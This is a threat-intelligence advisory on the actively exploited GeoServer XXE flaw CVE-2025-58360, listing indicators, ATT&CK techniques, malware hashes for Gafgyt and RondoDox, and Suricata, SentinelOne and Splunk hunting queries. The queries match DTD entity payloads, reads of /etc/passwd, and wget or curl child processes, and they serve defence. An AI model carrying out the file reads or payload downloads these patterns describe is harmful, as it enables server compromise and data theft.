GeoServer XXE Vulnerability CVE-2025-58360

Written By CyberDax

Potential Affected Sectors

·         Government (geospatial departments)
Environmental services

·         Research organizations

·         Any entity using the affected GeoServer software versions

Potential Affected Countries

·         Global

BLUF

Threat actors are actively exploiting a critical XML External Entity (XXE) vulnerability in un patched OSGeo GeoServer instances (versions older than 2.28.1), potentially leading to arbitrary file access, Server-Side Request Forgery (SSRF), and denial-of-service conditions. Over 250 active attack attempts were recorded in one 24-hour period, with mass exploitation warned within 48 hours.

Date of first reported activity

November 25, 2025

Date of last reported activity update

·         December 11, 2025

CVEs and CVSS Vectors

CVE-2025-58360

CVSS 3.1 Vector

·         (9.8) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nessus ID

·         This CVE is not currently on the Tenable plugin ID list

Is this on the KEV list?

·         Yes added December 11, 2025

What is the patch by date on the KEV list?

·         December 12, 2025

Patching/Mitigation Data

Patch Release Date

·         November 25, 2025.

Patch URL Link

hxxps://geoserver.org/download/

APT names

·         Affiliation is currently with general "Asia-affiliated threat clusters" and potentially Mirai/Gafgyt botnet operators

·         No specific APT group named at this time.

Associated criminal organization names

·         None named in public reporting

IOCs

·         IP addresses associated with Asia-affiliated threat clusters (specific IPs are dynamic, often originating from 154.61.77[.]* range initially).

·         Scanning for /geoserver/wms endpoint with XML inputs.

·         Commands executed post-exploitation (e.g., whoami, wget for malware samples)

Network and Traffic Indicators

·         Unusual Inbound Traffic: Look for spikes in traffic or a high number of requests to the /geoserver/wms endpoint.

·         Malformed XML Payloads: Inspect network traffic for crafted XML input that contains external entity references, specifically within the WMS GetMap operation requests. These often use DTD (Document Type Definition) declarations like <!DOCTYPE... > and <!ENTITY... > to call external URLs or local files.

·         Anomalous Outbound Traffic: The exploitation often leads to the server making unexpected outbound connections (Server-Side Request Forgery or SSRF) to internal network resources or external, potentially malicious, IP addresses or URLs.

·         Geographical Irregularities: Monitor for connections originating from or connecting to countries with which your organization does not typically do business. 

Host-Based Indicators

·         Unexpected File Access: Check server logs for evidence of the GeoServer process (or the user it runs under) accessing unusual files outside of its normal operating directories, such as /etc/passwd or configuration files (common targets for XXE file disclosure).

·         Anomalous Process Activity: Look for the spawning of unusual child processes by the main GeoServer process, which might indicate an attacker attempting further exploitation or establishing persistence.

·         Configuration Changes: Suspicious changes to system files or configurations that were not part of a planned administrative action

Tools used in campaign

·         Custom XML payloads

·         legitimate tools like Nuclei templates for scanning/PoC, Mirai/Gafgyt botnet variants

·          RondoDox malware

TTPs

·         TA0001 Initial Access

·         T1190 Exploit Public-Facing Application

·         TA0002 Execution

·         T1059 Command and Scripting Interpreter

·         T1003 OS Credential Dumping

·         TA0004 Privilege Escalation

·         TA0011 Exfiltration

Malware names

·         Mirai variants

·         Gafgyt variants

·         RondoDox

Malware Sample

Gafgyt

sha256

ebee38f02beecf097992c4ea94e6b3dcf860349c4ba6b336bdc9c34f9dce7fd9

URL link to sample

hxxps://www.virustotal.com/gui/file/ebee38f02beecf097992c4ea94e6b3dcf860349c4ba6b336bdc9c34f9dce7fd9

RondoDox

Sha256

4b8887434743d43ace1779e3381775faa8e3a89241422fe26fc5c4105ada7b17

URL Link to sample

hxxps://www.virustotal.com/gui/file/4b8887434743d43ace1779e3381775faa8e3a89241422fe26fc5c4105ada7b17

Suggest Rules/ potential hunts

These are indicator rules, they are likely to be noisy

Potential Suricata rules

Generic XXE DTD Detection

This rule looks for the string <!DOCTYPE followed by SYSTEM or PUBLIC within the HTTP body, which is highly indicative of an XXE attempt.

 

alert http any any -> any any (msg:"ET WEB_SERVER GeoServer CVE-2025-58360 XXE attempt in WMS request"; flow:established,to_server; content:"POST"; http_method; uri:"/geoserver/wms"; nocase; http_uri; content:"<!DOCTYPE"; nocase; http_client_body; content:"SYSTEM"; nocase; http_client_body; fast_pattern; classtype:attempted-recon; sid:1234567; rev:1;)

SentinelOne

 

·         Hunt for Suspicious Outbound Connections (SSRF indicator):

This looks for the GeoServer process making unusual network connections to private IP spaces (SSRF) or unexpected external domains that might be used for data exfiltration.

S1QL

Filter Name = "Java.exe" Or Name = "geoserver.sh" Filter Type = "Process" Filter HasAnyNetwork = True Filter "RemoteIP" In ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")

 

Monitor for child processes spawned by the GeoServer application process that execute unusual shell commands (whoami, wget, curl, chmod) or attempt to make outbound connections to known malicious IPs or download paths.

 

·         Hunt for File Access by the Process:

This query hunts for the GeoServer process accessing sensitive system files often targeted by XXE attacks (e.g., /etc/passwd on Linux).

S1QL

Filter Name = "Java.exe" Or Name = "geoserver.sh" Filter Type = "File" Filter "FilePath" Contains "/etc/passwd" Or "FilePath" Contains "web.xml"

Splunk

·         Splunk Web Access Log Query (XXE DTD detection):

This search looks for the sequence <!DOCTYPE and SYSTEM within the HTTP request body (POST_Data field).

index=weblogs uri="/geoserver/wms" (POST_Data="*<!DOCTYPE*" AND POST_Data="*SYSTEM*") OR (http_user_agent="*" AND uri_path="/geoserver/wms" AND request_payload="*<!ENTITY*") | table _time, src_ip, dest_ip, uri, POST_Data

 

·         Splunk Hunt for Subsequent SSRF/Outbound Activity:

First find the exploit attempt timestamp

index=weblogs uri="/geoserver/wms" POST_Data="*<!DOCTYPE*"

| transaction src_ip maxspan=30s

Then correlate with network traffic logs

| join src_ip [search index=network_logs dest_ip="<GeoServer_IP>" action=connected]

| table _time, src_ip, dest_ip, requested_url, bytes_out

 

Delivery method

·         Remote exploitation via a network request to the public-facing GeoServer application endpoint.

Email samples

Not applicable these a network based attacks

References

GeoServer Org

·         hxxps://geoserver.org/download/

NVD

·         hxxps://nvd.nist.gov/vuln/detail/CVE-2025-58360

CISA KEV Catalog

·         hxxps://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2025-58360&field_date_added_wrapper=all&field_cve=&sort_by=field_date_added&items_per_page=20&url=

GitHub

·         hxxps://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525

Wiz Vulnerability Database

·         hxxps://www.wiz.io/vulnerability-database/cve/cve-2025-58360

OpenCVE

·         hxxps://app.opencve.io/cve/CVE-2025-58360

VirusTotal

·         hxxps://www.virustotal.com/gui/file/4b8887434743d43ace1779e3381775faa8e3a89241422fe26fc5c4105ada7b17

·         hxxps://www.virustotal.com/gui/file/ebee38f02beecf097992c4ea94e6b3dcf860349c4ba6b336bdc9c34f9dce7fd9

CyberDax
Previous

WIRTE APT (Ashen Lepus) Espionage
Next

Google Chrome Zero-Day Campaign (Internal ID 466192044)